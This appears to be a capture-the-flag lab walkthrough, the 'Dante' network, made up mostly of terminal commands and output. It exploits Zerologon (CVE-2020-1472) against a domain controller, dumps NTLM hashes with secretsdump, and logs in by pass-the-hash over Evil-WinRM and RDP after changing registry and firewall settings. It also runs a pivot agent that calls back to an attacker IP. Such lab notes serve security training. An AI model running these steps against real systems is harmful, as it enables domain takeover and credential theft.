Activating the impacket zero
jay ~/Documents/tools took 23ms
➜ source zero/bin/activateExploit
➜ python zer0dump.py 172.16.1.20 -target_machine=DC01
Namespace(target='172.16.1.20', silver=False, target_da=None, port=445, target_machine='DC01')
Performing authentication attempts...
172.16.1.20
DANTE-DC01
================================================================================================================================================
Success! DC can be fully compromised by a Zerologon attack.
NetrServerPasswordSet2Response
ReturnAuthenticator:
Credential:
Data: b'\x01v"\x8e\xa0^\xbc<'
Timestamp: 0
ErrorCode: 0
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::
aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96
CRITICAL:root:SMB SessionError: STATUS_ACCOUNT_DISABLED(The referenced account is currently disabled and may not be logged on to.)Problems
The results show that he Account is disabled and can not be logged in.
Exploit 2
Setting Empty Password
jay CVE-2020-1472 on master [1+] via 🐍 python v3.11.2 (zero) took 337ms
✗ python cve-2020-1472-exploit.py -t 172.16.1.20 -n DANTE-DC01
_____ __
/__ / ___ _________ / /___ ____ _____ ____
/ / / _ \/ ___/ __ \/ / __ \/ __ `/ __ \/ __ \
/ /__/ __/ / / /_/ / / /_/ / /_/ / /_/ / / / /
/____/\___/_/ \____/_/\____/\__, /\____/_/ /_/
/____/
Checker & Exploit by VoidSec
Performing authentication attempts...
.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
[+] Success: Target is vulnerable!
[-] Do you want to continue and exploit the Zerologon vulnerability? [N]/y
y
[+] Success: Zerologon Exploit completed! DC's account password has been set to an empty string.
Dumping the secrets
jay impacket/examples on master [2+7?] via 🐍 python v3.11.2 (zero) took 21ms
➜ ./secretsdump.py -just-dc -no-pass 'DANTE.local/DANTE-DC01$@172.16.1.20'Logging in
evil-winrm -i 172.16.1.20 -u 'katwamba' -H 14a71f9e65448d83e8c63d46355837c3 /domain:dante.localEnable RDP
*Evil-WinRM* PS C:\Users\katwamba\Documents> Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name 'fDenyTSConnections' -value 0
*Evil-WinRM* PS C:\Users\katwamba\Documents> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name 'UserAuthentication' -value 1
*Evil-WinRM* PS C:\Users\katwamba\Documents> Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'xfreerdp
xfreerdp /u:katwamba /pth:14a71f9e65448d83e8c63d46355837c3 /v:172.16.1.20Flag
*Evil-WinRM* PS C:\Users\katwamba\Desktop> cat flag.txt
DANTE{Feel1ng_Blu3_or_Zer0_f33lings?}
*Evil-WinRM* PS C:\Users\katwamba\Documents> net user mrb3n
User name mrb3n
Full Name mrb3n
Comment mrb3n was here. I used keep my password S3kur1ty2020! here but have since stopped. DANTE{1_jusT_c@nt_st0p_d0ing_th1s}
Users comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 7/31/2020 4:43:25 PM
Password expires 1/27/2021 4:43:25 PM
Password changeable 7/31/2020 4:43:25 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.Connecting to DC02
./agent.exe -connect 10.10.14.4:11601 -ignore-cert